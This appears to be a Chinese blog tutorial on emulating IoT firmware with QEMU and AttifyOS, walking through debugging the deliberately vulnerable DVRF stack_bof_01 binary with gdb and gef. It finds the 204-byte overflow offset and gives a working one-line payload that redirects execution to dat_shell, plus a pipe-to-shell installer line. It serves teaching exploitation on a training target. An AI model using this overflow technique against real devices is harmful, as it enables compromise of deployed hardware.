动态分析IoT固件(三)

最新推荐文章于 2024-05-13 09:36:53 发布
最新推荐文章于 2024-05-13 09:36:53 发布
阅读量1.3k 收藏 5
点赞数 2
分类专栏: IOT
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43047908/article/details/119725772
版权

目录

前言

动态分析固件之前,需要先把固件运行起来,但我们手头又没有路由器、摄像头之类的物联网硬件,该如何运行呢?这就需要虚拟执行,虚拟执行你就把它想象成一个虚拟机可以运行各种物联网OS就是了。

QEMU这个模拟器想必都不陌生,一个近乎能够模拟所有硬件设备的软件,而Firmadyne这个工具,是一个基于QEMU的分析平台,包含模拟、固件提取、调试等功能。

但该工具很难安装,在kali上安装一直报错,人麻了。。。最终选择用attifyti提供的物联网渗透专用虚拟机,下载下来的文件直接用vmware导入就行了。

下载地址 https://www.dropbox.com/sh/xrfzyp1ex2uii53/AAAF0mdA1qFaEBDYZoIxaQRma?dl=0

模拟执行固件

下载好虚拟机文件导入VM打开

在这里插入图片描述

下面我们来演示虚拟执行一个dlink固件。

在tools/fat路径下运行fat.py

在这里插入图片描述

脚本执行成功后,会回显一个IP地址,这个IP就是模拟的固件地址。
在这里插入图片描述

调试固件

以上只是简单地演示如何虚拟执行一个固件,下面我们就来实操如何通过动态调试分析一个固件,接下来的固件采用DVRF,这是个网友自制的充满漏洞的固件,供学习用的。

git clone https://github.com/praetorian-code/DVRF.git

开始之前,安装以下工具,动态调试中会用到。

sudo apt install gdb-multiarch
wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh
sudo pip3 install capstone unicorn keystone-engine

安装keystone-engine时可能会报错,参考这个链接。
https://github.com/avatartwo/avatar2/issues/23

安装好工具后,就开始对固件进行分析啦,固件路径如下。

DVRF/Firmware/DVRF_v03.bin

使用binwalk提取固件文件系统。

binwalk -t -e DVRF_v03.bin

在这里插入图片描述

在这里插入图片描述

提取出来的系统有个文件夹pwnable,这个文件夹就是存放着有漏洞的程序示例,我们选取缓冲区漏洞程序stack_bof_01进行实验。首先使用readelf命令查看该程序的架构。

readelf -h pwnable/Intro/stack_bof_01

在这里插入图片描述
拷贝qwmu-mipsel-static到固件根目录:

cp (which qemu-mipsel-static) .

用qemu虚拟运行stack_bof_01,配合chroot虚拟执行stack_bof_01固件,可以成功执行。qemu是一款轻型的虚拟机。
在这里插入图片描述

查看stack_bof_01的源码,可以发现明显的strcpy内存溢出漏洞,当参数argv[1]超过200时,就会出现buf溢出的现象。

cat DVRF/Pwnable Source/Intro/stack_bof_01.c

在这里插入图片描述

以调试的方式启动程序,并在1234端口进行监听调试:

sudo chroot . ./qemu-mipsel-static -g 1234 ./pwnable/Intro/stack_bof_01

运行以下命令开始调试。

gdb-multiarch pwnable/Intro/stack_bof_01

gdb运行后,会自动加载gef插件,然后设置固件架构为mips。

set architecture mips

设置完远程调试的IP和端口,就可开始调试stack_bof_01程序了。

target remote 127.0.0.1:1234

在这里插入图片描述

调用命令查看样本的所有函数,可以看到各个函数的地址。

info functions

在这里插入图片描述
如果你感兴趣,可以使用命令查反汇编看下main函数的汇编码,这是mips架构的汇编码,跟x86的相差很大。

然后我们使用命令创建一个随机的300字节流,作为攻击字符串,用于测试参数溢出的点。

pattern create 300

在这里插入图片描述
重新带参数调试stack_bof_01。

sudo chroot . ./qemu-mipsel-static -g 1234 ./pwnable/Intro/stack_bof_01 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaac

在这里插入图片描述
gdb挂上去后,输入c回车让程序跑起来,会发现程序崩溃了,SIGSEGV内存出错,指针ra指向0x63616162,对应的ASCII是”baac”。

在这里插入图片描述
使用命令查看该溢出点在攻击字符串的什么位置,是位于pattern的第204位。

pattern search 0x63616162

在这里插入图片描述
然后反汇编dat_shell函数,查看其函数地址,我们的目的是要让程序本来执行0x63616162,变成执行dat_shell的地址,理论上应该把0x63616162改成0x400950,但调试中发现,当执行到0x400970时,gp寄存器指向了不可访问的地址,因此要略过前3条gp相关的指令。

将待执行的函数地址拼凑到204个字节后面,便可劫持程序执行流到dat_shell函数(0x40095C),从而实现缓冲区溢出攻击。

sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 "$(python -c "print 'A'*204 + '\x5c\x09\x40'")"

在这里插入图片描述

她总是阴雨天
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
物联网IoT安全教程()-- 动态分析IoT固件
安全杂货铺
01-15 2328
PS:本文所用到的程序见 – https://github.com/G4rb3n/IoT_Sec_Tutorial 动态分析固件之前,需要先把固件运行起来,但我们手头又没有路由器、摄像头之类的物联网硬件,该如何运行呢?这就需要虚拟执行,虚拟执行你就把它想象成一个虚拟机可以运行各种物联网OS就是了。虚拟执行IoT固件需要用到firmadyne工具,该工具很难安装,在kali上安装一直报错,你们可以尝...
firmadyne, 基于Linux的固件系统仿真与动态分析系统.zip
10-10
firmadyne, 基于Linux的固件系统仿真与动态分析系统 目录简介设置失败提取器数据库二进制文件QEMU使用情况常见问题解答来自源代码的编译链控制台插件libnvram内核插件ARMMIPS数据库数据架构纸张简介FIRMADYN
AttifyOS v3.0 路由qemu模拟环境的使用
want的博客
01-31 2892
1.打开环境是这样的 2.修改root密码为attify直接使用 3.运行python3 fat.py 固件后,qemu模拟器自动开启运行,固件使用自带目录下的zip文件,运行成功如下:
开源项目推荐:Firmadyne——嵌入式固件动态分析系统
最新发布
gitblog_00027的博客
05-13 253
开源项目推荐:Firmadyne——嵌入式固件动态分析系统 项目地址:https://gitcode.com/firmadyne/firmadyne 项目介绍 Firmadyne 是一个强大的自动化和可扩展的系统,专为Linux基的嵌入式固件执行的模拟和动态分析设计。它集成了多种组件,包括修改后的内核、NVRAM库、提取器、控制台应用以及用于下载固件的爬虫。该系统不仅支持基本的分析功能,如查找可访...
嵌入式设备和固件中的自动漏洞检测(二):动态分析与符号执行技术
qq_40229814的博客
08-31 2720
嵌入式系统和固件漏洞检测技术调研的第二部分,调研了模糊测试等动态分析技术、符号执行技术在嵌入式设备和固件的漏洞检测中的应用。
物联网设备是如何被破解的?分析一种篡改IoT固件内容的攻击方式
顶象科技的技术文章
12-19 4229
大家是否有想过,自己身边的硬件设备有可能已经被植入了恶意代码?
路由器逆向分析------路由器固件分析和动态调试环境搭建简述
Fly20141201. 的专栏
04-12 7231
本文博客地址:http://blog.csdn.net/qq1084283172/article/details/70140865 01.路由器固件分析和动态调试环境搭建简述的原文 《Emulating and Debugging Workspace》这篇博文时间比较早,但是详细的介绍了路由器固件分析和动态调试环境搭建简要步骤和一些重要的信息。为了避免翻译带来的错误,直接将作者的原文摘
2022年全球固件(BIOS固件)行业现状及发展前景分析共
11-08
固件,尤其是BIOS固件,是计算机系统中至关重要的组成部分。BIOS(基本输入输出系统)是计算机启动时...这份报告通过深入分析现状和前景,为业界提供了有价值的洞见,对于理解固件市场动态和规划未来战略具有重要意义。
NB-IOT文件.zi项目实战
05-01
10. **市场趋势与未来展望**:关注NB-IoT市场的最新动态,探讨5G和eMTC等新技术对NB-IoT的影响,以及未来物联网发展的方向。 通过"NB-IoT文件.zi项目实战",你将有机会深入学习和实践这些知识点,从而成为一名熟练...
IoT DC3 是一个基于 Spring Cloud 的开源的、分布式的物联网(IoT)平台
05-16
作为一整套物联系统解决方案,IoT DC3 还包括数据处理和分析能力,可以对接各种大数据处理框架,如 Apache Hadoop、Spark 或 Flink,进行实时或离线的数据分析。此外,边缘计算的支持使得 IoT DC3 能够在设备端进行...
HCIP-IOT(H52-111).zip
07-14
3. **云计算与大数据**:掌握云计算平台在物联网中的作用,例如华为云IoT平台,以及如何利用这些平台进行设备管理、数据处理和分析。同时,理解大数据处理的基本原理和工具,如Hadoop、Spark等。 4. **物联网安全**...
IoT Hunter使用文档1
08-08
IoT Hunter的动态提取工具需要搭建分析环境,配置分析工具,并使用动态分析工具进行分析。 五、 使用扩展接口 IoT Hunter提供了良好的扩展接口,用户可以根据需要添加新的分析插件。 (一) 添加静态分析 plugin ...
Linux命令查看系统cpu,内存,网卡等硬件固件信息
lcdxshengpeng的博客
09-10 4144
1.查看CPU信息 命令lscpu [全称: list CPU] 我们可以看到一些cpu的架构的信息 例如: 架构:64位;CPU个数:6;CPU频率:800MHz; 1,2,3级缓存 等等 也可通过命令 dmidecode -t processor 查看 2.查看内存信息 cat /proc/meminfo 我们可以看到有总量,空余量,缓存大小等信息。如果想要只看到内存使用信息,可以使...
qemu网络配置-桥接-IOT固件模拟
qq_43390703的博客
10-26 7145
QEMU网络策略 在进行IOT固件模拟的过程中,我们需要进行poc的验证需要能够启动系统级的qemu模拟,这时候需要将固件文件系统传到qemu虚拟机中,我们需要通过qemu网络通信的方法去串通本机和qemu虚拟机。 qemu的网络通信方法 user mode stack 用户协议栈方式,这种方式相当于在qemu进程中实现一个协议栈,这个协议栈被视为一个主机与虚拟机之间的NAT服务器,负责将qemu所模拟的系统网络请求转发到外部网卡上,从而实现网络通信,但是不能将外面的请求转发至虚拟机内部,并且虚拟机vlan
ida动态调试elf(无坑详细)
hnzwx888的专栏
12-28 807
原文网址:https://www.52pojie.cn/thread-730499-1-11.html   虽然linux下有gdb,radare2等神器,但有时候难免有用到IDA动态调试linux下文件的时候,这次自己按照网上教程来但是踩了无数坑,所以打算自己写一篇教程 1.把ida中dbgsrv目录下的linux_server或者linux_serverx64放到linux中(根据自己要调...
ubuntu18.04 & AttifyOSv3.0
Hepburn_Sunsir的博客
08-20 480
1,查看版本信息 cat /proc/version 2,使用burpsuit /usr/bin/java -Xmx2g -jar burpsuite_free_v1.7.23.jar 3,使用 wireshark sudo wireshark
Tenda AC15路由器仿真——IDA+QEMU
The54No1的博客
03-07 1256
使用IDA对tenda AC15路由器进行仿真
qemu虚拟机模拟固件环境搭建
weixin_52111404的博客
07-30 5527
qemu虚拟机模拟固件环境搭建并配置路由器漏洞分析环境
esp8266的IOT固件
09-15
对于ESP8266的IoT固件,有几种常见的选择可供使用。以下是其中一些流行的固件: 1. Arduino:ESP8266可以使用Arduino开发环境进行编程。你可以使用Arduino IDE来编写代码,并通过Arduino核心库和ESP8266核心库来控制硬件。 2. NodeMCU:NodeMCU是一个基于Lua脚本语言的开发平台,它使得编写和执行代码变得非常简单。你可以使用NodeMCU开发固件来控制ESP8266。 3. MicroPython:MicroPython是一种基于Python的微型解释器,可用于在嵌入式设备上运行。ESP8266支持MicroPython,你可以使用它来编写高级的Python代码控制ESP8266。 4. Espressif固件:Espressif公司为ESP8266提供了自己的固件,称为Espressif固件。它提供了丰富的功能和API,可以支持各种IoT应用。 这些只是一些流行的选择,实际上还有其他许多固件可供选择,根据你的需求和技术偏好选择合适的固件

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值